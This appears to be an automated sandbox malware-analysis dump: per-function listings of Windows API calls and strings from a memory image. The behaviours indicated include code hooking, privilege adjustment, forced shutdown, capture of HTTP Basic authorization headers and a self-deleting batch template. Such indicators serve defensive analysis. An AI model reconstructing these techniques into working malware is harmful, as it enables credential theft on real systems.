GetModuleHandleW.KERNEL32(?), ref: 00B14E8A

Part of subcall function 00B1509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00B150E0

Part of subcall function 00AF7D68: InitializeCriticalSection.KERNEL32 ref: 00AF7D88

Part of subcall function 00B13C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00B13C98
Part of subcall function 00B13C83: StrCmpIW.SHLWAPI(?,?), ref: 00B13CA2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEC5FE, Relevance: 7.3, APIs: 4, Instructions: 104

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00AED203,?,?,00000000,?,?,?,?,00000000), ref: 00AEC631

Part of subcall function 00B0D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00B0D0B5

memcmp.MSVCRT ref: 00AEC67F

Part of subcall function 00AF32C5: memcpy.MSVCRT ref: 00AF32FB
Part of subcall function 00AF32C5: memcpy.MSVCRT ref: 00AF330F
Part of subcall function 00AF32C5: memset.MSVCRT ref: 00AF331D

SetEvent.KERNEL32 ref: 00AEC6C0

Part of subcall function 00AEF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00AED203,?,?,00000000,?), ref: 00AEC6ED

Part of subcall function 00B11E96: EnterCriticalSection.KERNEL32(?,?,?,?,00AECAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00B11E9C
Part of subcall function 00B11E96: memcmp.MSVCRT ref: 00B11EC8
Part of subcall function 00B11E96: memcpy.MSVCRT ref: 00B11F13
Part of subcall function 00B11E96: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00B11F1F

Part of subcall function 00AECBBC: TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00AED203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00AECC39
Part of subcall function 00AECBBC: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00AED203,?,?,00000000,?), ref: 00AECCB3
Part of subcall function 00AECBBC: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00AED203,?,?,00000000,?), ref: 00AECCD2
Part of subcall function 00AECBBC: LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00AED203,?,?,00000000), ref: 00AECD20

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0AF4A, Relevance: 7.3, APIs: 4, Instructions: 91

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00B1F128), ref: 00B0AF7C
DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00B0AF9C

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

Part of subcall function 00B05C1C: memset.MSVCRT ref: 00B05C5F

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

Part of subcall function 00AEA150: memcpy.MSVCRT ref: 00AEA18C
Part of subcall function 00AEA150: memcpy.MSVCRT ref: 00AEA1A1
Part of subcall function 00AEA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00AEA1D3
Part of subcall function 00AEA150: memcpy.MSVCRT ref: 00AEA209
Part of subcall function 00AEA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00AEA239
Part of subcall function 00AEA150: memcpy.MSVCRT ref: 00AEA26F
Part of subcall function 00AEA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00AEA29F

memset.MSVCRT ref: 00B0B039
memcpy.MSVCRT ref: 00B0B04B

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF19E0, Relevance: 7.2, APIs: 4, Instructions: 70

APIs

EnterCriticalSection.KERNEL32(00DB1E90), ref: 00AF19EE

Part of subcall function 00AF353D: EnterCriticalSection.KERNEL32(00B23510,00DB1E90,00AF376F,?,?,?,?,?,00AF191E,?,?,?,?,00B048EB), ref: 00AF354D
Part of subcall function 00AF353D: LeaveCriticalSection.KERNEL32(00B23510,?,?,?,?,?,00AF191E,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF3575

PathFindFileNameW.SHLWAPI(?), ref: 00AF1A21

Part of subcall function 00AF357D: VirtualProtect.KERNEL32(?,00AF37D4,00000080,?), ref: 00AF35ED
Part of subcall function 00AF357D: GetCurrentThread.KERNEL32 ref: 00AF36AC
Part of subcall function 00AF357D: GetThreadPriority.KERNEL32 ref: 00AF36B5
Part of subcall function 00AF357D: SetThreadPriority.KERNEL32(?,0000000F), ref: 00AF36C6
Part of subcall function 00AF357D: Sleep.KERNEL32(00000000), ref: 00AF36CA
Part of subcall function 00AF357D: memcpy.MSVCRT ref: 00AF36D9
Part of subcall function 00AF357D: FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00AF36EA
Part of subcall function 00AF357D: SetThreadPriority.KERNEL32 ref: 00AF36F2
Part of subcall function 00AF357D: GetTickCount.KERNEL32 ref: 00AF370D
Part of subcall function 00AF357D: GetTickCount.KERNEL32 ref: 00AF371A
Part of subcall function 00AF357D: Sleep.KERNEL32(00000000), ref: 00AF3727
Part of subcall function 00AF357D: VirtualProtect.KERNEL32(?,00AF37D4,00000000,?), ref: 00AF3756

Part of subcall function 00B1509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00B150E0

LeaveCriticalSection.KERNEL32(00DB1E90), ref: 00AF1A9E

Part of subcall function 00AEBC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00AEBC6B

Part of subcall function 00AFBE32: EnterCriticalSection.KERNEL32(00B23510,00DB1E90,00AFD8CC,?,00AF1988,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AFBE42
Part of subcall function 00AFBE32: LeaveCriticalSection.KERNEL32(00B23510,?,00AF1988,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AFBE71

PathFindFileNameW.SHLWAPI(?), ref: 00AF1A64

Part of subcall function 00B13C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00B13C98
Part of subcall function 00B13C83: StrCmpIW.SHLWAPI(?,?), ref: 00B13CA2

Part of subcall function 00AEDA34: PathFindFileNameW.SHLWAPI(?), ref: 00AEDA53
Part of subcall function 00AEDA34: PathRemoveExtensionW.SHLWAPI(?), ref: 00AEDA7C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF9346, Relevance: 7.2, APIs: 4, Instructions: 65

APIs

HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00AF9375
GetLastError.KERNEL32(?,00000000,3D94878D,00000000,3D94878D,00B0D67C,?,?,?,?,?,00AE7900,?,?,?), ref: 00AF937B

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

memcpy.MSVCRT ref: 00AF93A6
HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00AF93BF

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0D0DA, Relevance: 7.2, APIs: 4, Instructions: 61

APIs

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

QueryPerformanceCounter.KERNEL32(?), ref: 00B0D0F9
GetTickCount.KERNEL32 ref: 00B0D106

Part of subcall function 00AEF1A8: EnterCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1B8
Part of subcall function 00AEF1A8: LeaveCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1E2

Part of subcall function 00AE9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00AE9ACA
Part of subcall function 00AE9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00AE9AEF

memset.MSVCRT ref: 00B0D15A
memcpy.MSVCRT ref: 00B0D16A

Part of subcall function 00AE9A2A: CryptDestroyHash.ADVAPI32 ref: 00AE9A42
Part of subcall function 00AE9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AE9A53

Part of subcall function 00AE9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00AE9B41

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B04461, Relevance: 7.2, APIs: 4, Instructions: 56

APIs

PathSkipRootW.SHLWAPI(?), ref: 00B0448B
GetFileAttributesW.KERNEL32(?), ref: 00B044B8
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B044CC
SetLastError.KERNEL32(00000050), ref: 00B044EF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEA46D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 51

APIs

memset.MSVCRT ref: 00AEA47C
memset.MSVCRT ref: 00AEA4BF
memset.MSVCRT ref: 00AEA4F5

Strings

8, xrefs: 00AEA4B3

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B1E290, Relevance: 7.2, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B1EC47
UnhandledExceptionFilter.KERNEL32(00AE4D1C), ref: 00B1EC52
GetCurrentProcess.KERNEL32 ref: 00B1EC5D
TerminateProcess.KERNEL32 ref: 00B1EC64

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12155, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133

APIs

Part of subcall function 00B03EFF: CharLowerW.USER32(?), ref: 00B03FBA

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

ExitWindowsEx.USER32(00000014,80000000), ref: 00B1228F
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00B122CF

Part of subcall function 00AF9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF9CCE
Part of subcall function 00AF9C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00AF9D17
Part of subcall function 00AF9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF9D3E
Part of subcall function 00AF9C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 00AF9D87
Part of subcall function 00AF9C8D: SetEvent.KERNEL32 ref: 00AF9D9A
Part of subcall function 00AF9C8D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF9DAD
Part of subcall function 00AF9C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF9DF1
Part of subcall function 00AF9C8D: CharToOemW.USER32(?,?), ref: 00AF9E6F
Part of subcall function 00AF9C8D: CharToOemW.USER32(?,?), ref: 00AF9E81
Part of subcall function 00AF9C8D: ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00AF9EEC

Part of subcall function 00B0582C: EnterCriticalSection.KERNEL32(00B23510,?,?,?,00AFE9BA), ref: 00B05842
Part of subcall function 00B0582C: LeaveCriticalSection.KERNEL32(00B23510,?,?,?,00AFE9BA), ref: 00B05868
Part of subcall function 00B0582C: CreateMutexW.KERNEL32(00B22974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00B0587A

Part of subcall function 00AF2FB7: ReleaseMutex.KERNEL32 ref: 00AF2FBB
Part of subcall function 00AF2FB7: CloseHandle.KERNEL32 ref: 00AF2FC2

ExitWindowsEx.USER32(00000014,80000000), ref: 00B122E2

Part of subcall function 00AF50C0: GetCurrentThread.KERNEL32 ref: 00AF50D4
Part of subcall function 00AF50C0: OpenThreadToken.ADVAPI32 ref: 00AF50DB
Part of subcall function 00AF50C0: GetCurrentProcess.KERNEL32 ref: 00AF50EB
Part of subcall function 00AF50C0: OpenProcessToken.ADVAPI32 ref: 00AF50F2
Part of subcall function 00AF50C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00AF5113
Part of subcall function 00AF50C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00AF5128
Part of subcall function 00AF50C0: GetLastError.KERNEL32 ref: 00AF5132
Part of subcall function 00AF50C0: CloseHandle.KERNEL32(00000001), ref: 00AF5143

Part of subcall function 00B0407B: memcpy.MSVCRT ref: 00B0409B

Strings

SeShutdownPrivilege, xrefs: 00B122B1

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B1299E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51

APIs

shutdown.WS2_32(?,00000001), ref: 00B129AC
WSAGetLastError.WS2_32(?,00000001,?,?,?,?,?,?,?,00B0FF4F,?,?,?,00002710,?,?), ref: 00B129CD
WSASetLastError.WS2_32(00000000,?,00000001), ref: 00B12A12

Strings

, xrefs: 00B129F3

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B131E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30

APIs

Part of subcall function 00B12755: EnterCriticalSection.KERNEL32(00B23510,?,00B130AF,?,?,00000000), ref: 00B12765
Part of subcall function 00B12755: LeaveCriticalSection.KERNEL32(00B23510,?,00000000), ref: 00B1278F

WSAAddressToStringA.WS2_32(?,?,00000000,?,?), ref: 00B1320B
lstrcpyA.KERNEL32(?,0:0,?,00000000,?,?,?,?,?,?,00B10029,?,?,?,?), ref: 00B1321B

Strings

0, xrefs: 00B131FD
0:0, xrefs: 00B13215

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12DBA, Relevance: 6.9, APIs: 2, Strings: 1, Instructions: 63

APIs

WSAGetLastError.WS2_32 ref: 00B12DF0
WSASetLastError.WS2_32(00002775), ref: 00B12E54

Strings

, xrefs: 00B12E18

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF1D27, Relevance: 6.5, APIs: 5, Instructions: 213

APIs

memset.MSVCRT ref: 00AF1DCD

Part of subcall function 00AEF1EF: memcmp.MSVCRT ref: 00AEF1FB

Part of subcall function 00AEF040: memcmp.MSVCRT ref: 00AEF0B6

Part of subcall function 00AEEEA9: memcpy.MSVCRT ref: 00AEEED2

Part of subcall function 00AEEDAE: memcpy.MSVCRT ref: 00AEEDF9

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

memset.MSVCRT ref: 00AF1E71
memcpy.MSVCRT ref: 00AF1E84
memcpy.MSVCRT ref: 00AF1EA6
memcpy.MSVCRT ref: 00AF1EC6

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

Part of subcall function 00AEC907: EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00AECB5E,?), ref: 00AEC961
Part of subcall function 00AEC907: InterlockedIncrement.KERNEL32 ref: 00AEC99E
Part of subcall function 00AEC907: SetEvent.KERNEL32 ref: 00AEC9BC
Part of subcall function 00AEC907: LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00AECB5E,?), ref: 00AEC9C9

Part of subcall function 00AEF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF92DF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 46

APIs

memset.MSVCRT ref: 00AF92F2
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00AF9314

Part of subcall function 00AF93E9: SetLastError.KERNEL32(00000008,00003A98,?,00000000,00AF9326,?,?,00000000), ref: 00AF9412
Part of subcall function 00AF93E9: memcpy.MSVCRT ref: 00AF9432
Part of subcall function 00AF93E9: memcpy.MSVCRT ref: 00AF946A
Part of subcall function 00AF93E9: memcpy.MSVCRT ref: 00AF9482

Strings

<, xrefs: 00AF930D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF95BE, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 45

APIs

Part of subcall function 00B13629: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00B1363C
Part of subcall function 00B13629: GetLastError.KERNEL32(?,00AF5032,?,00000008,?,?,?,?,?,?,00B049E1,?,?,00000001), ref: 00B13646
Part of subcall function 00B13629: GetTokenInformation.ADVAPI32(?,00000001,?,?,?), ref: 00B1366E

EqualSid.ADVAPI32(?,5B867A00), ref: 00AF95E1

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF52FF: LoadLibraryA.KERNEL32(userenv.dll), ref: 00AF530F
Part of subcall function 00AF52FF: GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00AF532D
Part of subcall function 00AF52FF: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00AF5339
Part of subcall function 00AF52FF: memset.MSVCRT ref: 00AF5379
Part of subcall function 00AF52FF: CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00AF53C6
Part of subcall function 00AF52FF: CloseHandle.KERNEL32(?), ref: 00AF53DA
Part of subcall function 00AF52FF: CloseHandle.KERNEL32(?), ref: 00AF53E0
Part of subcall function 00AF52FF: FreeLibrary.KERNEL32 ref: 00AF53F4

CloseHandle.KERNEL32(00000001), ref: 00AF9628

Strings

"%s", xrefs: 00AF95F5

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B067C9, Relevance: 6.4, APIs: 5, Instructions: 160

APIs

Part of subcall function 00AEF1A8: EnterCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1B8
Part of subcall function 00AEF1A8: LeaveCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1E2

memcmp.MSVCRT ref: 00B067F4

Part of subcall function 00B0D95F: GetSystemTime.KERNEL32(?), ref: 00B0D969

memcmp.MSVCRT ref: 00B06859

Part of subcall function 00AF6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43
Part of subcall function 00AF6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

memset.MSVCRT ref: 00B068ED
memcpy.MSVCRT ref: 00B0691A
memcmp.MSVCRT ref: 00B06952

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEEE09, Relevance: 6.4, APIs: 4, Instructions: 62

APIs

memset.MSVCRT ref: 00AEEE1C
memcpy.MSVCRT ref: 00AEEE37
memcpy.MSVCRT ref: 00AEEE5F
memcpy.MSVCRT ref: 00AEEE83

Part of subcall function 00AEEDAE: memcpy.MSVCRT ref: 00AEEDF9

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF7DF0, Relevance: 6.4, APIs: 3, Instructions: 56

APIs

EnterCriticalSection.KERNEL32(00000014,?,?,?,?,00AEB9D5,00000003,?,00000000,00000000), ref: 00AF7E07
InterlockedIncrement.KERNEL32(?,?), ref: 00AF7E5B
LeaveCriticalSection.KERNEL32(00000014,?,?,?,00000000,?,?,?,?,00AEB9D5,00000003,?,00000000,00000000), ref: 00AF7E62

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEF5E9, Relevance: 6.3, APIs: 4, Instructions: 168

APIs

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

Part of subcall function 00B0CFF2: memset.MSVCRT ref: 00B0D01A

memcpy.MSVCRT ref: 00AEF79E

Part of subcall function 00B0D06B: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B0D07B

memcpy.MSVCRT ref: 00AEF719
memcpy.MSVCRT ref: 00AEF731

Part of subcall function 00B0D17E: memcpy.MSVCRT ref: 00B0D19E
Part of subcall function 00B0D17E: memcpy.MSVCRT ref: 00B0D1CA

memcpy.MSVCRT ref: 00AEF78D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5AD5, Relevance: 6.3, APIs: 3, Instructions: 10

APIs

GetLastError.KERNEL32(?,00AEBA1E), ref: 00AF5AD6
TlsSetValue.KERNEL32(00000000), ref: 00AF5AE6
SetLastError.KERNEL32(?,?,00AEBA1E), ref: 00AF5AED

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00181, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 91

APIs

Part of subcall function 00B13CFF: StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00B13D14
Part of subcall function 00B13CFF: lstrcmpA.KERNEL32(Basic ,?,00B001C0,00000006,Authorization,?,?,?), ref: 00B13D1E

StrChrA.SHLWAPI(?,0000003A), ref: 00B00212

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Strings

Authorization, xrefs: 00B00191
Basic , xrefs: 00B001B6

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEA509, Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 66

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AEA54A

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

PathRenameExtensionW.SHLWAPI(?,?), ref: 00AEA59B

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00AEA56B

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEE6AF, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 47

APIs

GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00AEE6BC
CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00AEE6DC

Part of subcall function 00AEE348: CloseHandle.KERNEL32 ref: 00AEE354

Part of subcall function 00AEE5F1: memcpy.MSVCRT ref: 00AEE632
Part of subcall function 00AEE5F1: memcpy.MSVCRT ref: 00AEE645
Part of subcall function 00AEE5F1: memcpy.MSVCRT ref: 00AEE658
Part of subcall function 00AEE5F1: memcpy.MSVCRT ref: 00AEE663
Part of subcall function 00AEE5F1: GetFileTime.KERNEL32(?,?,?), ref: 00AEE687
Part of subcall function 00AEE5F1: memcpy.MSVCRT ref: 00AEE69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00AEE6B2 00AEE6B3 00AEE6B9 00AEE6DB

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEBBAD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 46

APIs

Part of subcall function 00AEB6D0: EnterCriticalSection.KERNEL32(00B23510,?,00AEBBBB,00DB1E90,?,00AF1983,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AEB6E0
Part of subcall function 00AEB6D0: LeaveCriticalSection.KERNEL32(00B23510,?,00AF1983,?,?,?,?,?,?,00B048EB,?,?,00000000), ref: 00AEB715

VerQueryValueW.VERSION(?,00AE75E4,?,?,00DB1E90,?,00AF1983,?,?,?,?,?,?,00B048EB), ref: 00AEBBCE
GetModuleHandleW.KERNEL32(?), ref: 00AEBC0F

Part of subcall function 00AEBC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00AEBC6B

Strings

4, xrefs: 00AEBBD9

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B046CB, Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 34

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B0470E

Part of subcall function 00B13D5A: memcpy.MSVCRT ref: 00B13D94

Part of subcall function 00B04214: EnterCriticalSection.KERNEL32(00B23510,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00B0422E
Part of subcall function 00B04214: LeaveCriticalSection.KERNEL32(00B23510,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00B04261
Part of subcall function 00B04214: CoTaskMemFree.OLE32(00000000), ref: 00B042F6
Part of subcall function 00B04214: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04303
Part of subcall function 00B04214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00B0431A

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00B046D9
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00B046EE

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF93E9, Relevance: 6.2, APIs: 4, Instructions: 70

APIs

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

SetLastError.KERNEL32(00000008,00003A98,?,00000000,00AF9326,?,?,00000000), ref: 00AF9412
memcpy.MSVCRT ref: 00AF9432
memcpy.MSVCRT ref: 00AF946A
memcpy.MSVCRT ref: 00AF9482

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF1BDD, Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 17

APIs

#6.OLEAUT32 ref: 00AF1BE7
#2.OLEAUT32(ProhibitDTD), ref: 00AF1BF5

Strings

ProhibitDTD, xrefs: 00AF1BF0

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEF20B, Relevance: 6.2, APIs: 4, Instructions: 63

APIs

memset.MSVCRT ref: 00AEF219
memcpy.MSVCRT ref: 00AEF23A
memcpy.MSVCRT ref: 00AEF260
memcpy.MSVCRT ref: 00AEF284

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B11E96, Relevance: 6.2, APIs: 4, Instructions: 60

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00AECAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00B11E9C
memcmp.MSVCRT ref: 00B11EC8
memcpy.MSVCRT ref: 00B11F13
LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00B11F1F

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

